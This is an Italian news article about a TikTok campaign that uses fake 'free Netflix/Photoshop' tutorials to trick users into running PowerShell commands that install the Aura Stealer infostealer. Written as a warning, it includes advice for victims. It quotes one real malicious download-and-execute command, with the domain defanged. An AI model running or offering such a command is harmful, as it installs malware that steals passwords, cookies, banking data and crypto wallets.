Una pericolosa campagna di TikTok promette account Netflix gratuiti per installare malware e rubare dati: ecco come rilevarla
È stata individuata una nuova forma di furto di dati su TikTok, dove circolano video che mostrano presunti metodi per scaricare versioni gratuite di programmi come Windows, Netflix o Photoshop.
Dietro questi falsi tutorial si nasconde una frode informatica progettata per rubare le informazioni personali e finanziarie degli utenti, secondo l'esperto di sicurezza informatica Xavier Mertens del SANS Internet Storm Center (ISC).
I video, che hanno un tono informale e sembrano guide innocue, spiegano agli utenti come eseguire comandi sui loro computer.
Photoshop è una delle app che promette di essere gratuita e che installa malware. Foto: iStock
Tuttavia, invece di attivare funzionalità "premium", i comandi installano software dannoso. Questo metodo, identificato come ClickFix, era stato precedentemente segnalato dal portale di sicurezza informatica Trend Micro e ora si è diffuso su TikTok a causa dell'elevata presenza di giovani utenti interessati a trucchi tecnologici e download gratuiti.
Mertens ha avvertito che TikTok è diventato un canale attraente per i criminali informatici, poiché la dinamica di fiducia tra creatori e utenti facilita la rapida diffusione di video fuorvianti. "È una forma di ingegneria sociale molto efficace. Le persone si fidano dei creatori e non sospettano che un semplice comando possa compromettere la loro sicurezza", ha osservato l'analista.
Uno degli esempi rilevati mostra un video che promette di attivare Photoshop gratuitamente, chiedendo agli utenti di eseguire il seguente comando in PowerShell:
- iex (irm slmgr[.]win/photoshop).
Anche Netflix promette un furto di dati. Foto: iStock
Sebbene sembri un'innocua istruzione tecnica, in realtà collega il computer a un server remoto che scarica file dannosi. Secondo il sito web di Bleeping Computer, questi file includono una variante del malware Aura Stealer , in grado di estrarre password salvate nei browser, cookie di autenticazione, dati bancari e wallet di criptovalute.
Gli esperti raccomandano a chi ha seguito le istruzioni in questi video di cambiare immediatamente tutte le password, comprese quelle di e-mail, social media e conti bancari. Dovrebbero anche eseguire una scansione completa con un antivirus aggiornato ed evitare di eseguire comandi o scaricare qualsiasi cosa che non provenga da fonti ufficiali.
Altre notizie:
eltiempo
